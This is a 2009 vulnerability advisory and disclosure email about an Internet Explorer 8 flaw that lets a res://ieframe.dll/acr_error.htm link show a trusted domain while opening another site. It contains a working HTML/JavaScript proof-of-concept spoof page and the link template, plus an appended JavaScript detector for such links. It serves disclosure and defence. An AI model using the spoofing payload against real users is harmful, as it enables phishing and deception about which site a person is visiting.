
ie8betarc1-spoof.txt

Posted on 05 March 2009

###########################################
IE8 beta RC1 res://ieframe.dll/acr_error.htm Spoof
Vendor page: www.microsoft.com
Advisory: http://lostmon.blogspot.com/2009/03/ie8-beta-rc1-resieframedllacrerrorhtm.html
Vendor notified: yes
Exploit available: yes
############################################

Internet Explorer 8 has a flaw that allows remote users to spoof the domain name in 'ieframe.dll' when it is set to 'acr_error.htm' in the res: URI handler. A remote user can compose a bad link that shows, for example, google.com as the domain name, but when the link is clicked it goes to another site (spoofing).

#################
Proof of concept
#################

<html>
<head>
<script type="text/javascript">
function open_win()
{
window.open("res://ieframe.dll/acr_error.htm#http://www.google.com/,http://Lostmon.blogspot.com","_blank","toolbar=yes, location=no, directories=no, status=no, menubar=yes, scrollbars=no, resizable=no, copyhistory=no");
}
</script>
</head>
<title>..:[-IE8 res://ieframe.dll/acr_error.htm Domain name Spoff -]:..</title>
<body>
<form>
<input type="button" value="Open Window" onclick="open_win()">
</form>
</body>
</html>

#######################################

Thanks to estrella for being my light
Thanks to all the Lostmon Team

---------- Forwarded message ----------
From: Lostmon lords <lostmon@gmail.com>
Date: 2009/3/4
Subject: ie8 spoof the domain name in ieframe.dll when is set to acr_error.htm in res: uri handler
To: Microsoft Security Response Center <secure@microsoft.com>

Hello

Internet Explorer 8 has a flaw that allows remote users to spoof the domain name in ieframe.dll when it is set to acr_error.htm in the res: URI handler. A remote user can compose a malicious link that shows, for example, google.com as the domain name, but when the link is clicked it goes to another site (spoof).

res://ieframe.dll/acr_error.htm#[trusted domain],[attackers site]

See the attached file as a PoC.

res://ieframe.dll/acr_error.htm

I tested it on Windows 2003 and WinXP Pro & Home with IE 7 and it does not work; it appears that it affects only IE8.

Thanks for your time!!!!

--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....
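
A content-filter check for the link format reported above, as an added example that is not part of the original advisory or message. It assumes the fragment layout is "<displayed URL>,<destination URL>"; the function names and the example.org / example.test hosts are constructed for illustration.

```javascript
// Added example, not code from the advisory. Flags res://ieframe.dll/acr_error.htm
// links whose fragment names one host to display and a different host to open.
// Assumption: the fragment layout is "<displayed URL>,<destination URL>".
const RES_LINK = /res:\/\/[^\s"'<>#]+#\s*[^\s"'<>]+/gi;
const ERROR_PAGE = /^res:\/\/ieframe\.dll\/acr_error\.htm$/i;

// Return the lower-cased host of an http(s) URL, or null if it is not one.
function hostOf(candidate) {
  try {
    const u = new URL(candidate.trim());
    return /^https?:$/.test(u.protocol) ? u.hostname : null;
  } catch (e) {
    return null;
  }
}

// Inspect a single link and report both hosts when they disagree.
function inspectResLink(href) {
  const hashAt = href.indexOf("#");
  if (hashAt < 0 || !ERROR_PAGE.test(href.slice(0, hashAt))) return null;
  let fragment = href.slice(hashAt + 1);
  // Decode so percent-encoded commas or schemes are not missed.
  try { fragment = decodeURIComponent(fragment); } catch (e) { /* keep raw text */ }
  const comma = fragment.indexOf(",");
  if (comma < 0) return null;
  const displayed = hostOf(fragment.slice(0, comma));
  const destination = hostOf(fragment.slice(comma + 1));
  if (!displayed || !destination || displayed === destination) return null;
  return { href, displayed, destination };
}

// Scan arbitrary text (page source, mail body, proxy log) for such links.
function findSpoofedResLinks(text) {
  const hits = [];
  for (const match of text.match(RES_LINK) || []) {
    const finding = inspectResLink(match);
    if (finding) hits.push(finding);
  }
  return hits;
}

// Constructed sample input; example.org and example.test are placeholder hosts.
const sample = [
  '<a href="res://ieframe.dll/acr_error.htm#http://www.example.org/,http://other.example.test/">a</a>',
  '<a href="res://ieframe.dll/acr_error.htm#http://www.example.org/,http://www.example.org/x">b</a>',
  '<a href="res://ieframe.dll/acr_error.htm">c</a>',
  '<a href="http://www.example.org/#a,b">d</a>',
].join("\n");

console.log(findSpoofedResLinks(sample));
```

Only the first sample link is reported, because it is the only one where the displayed host and the destination host differ.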

 
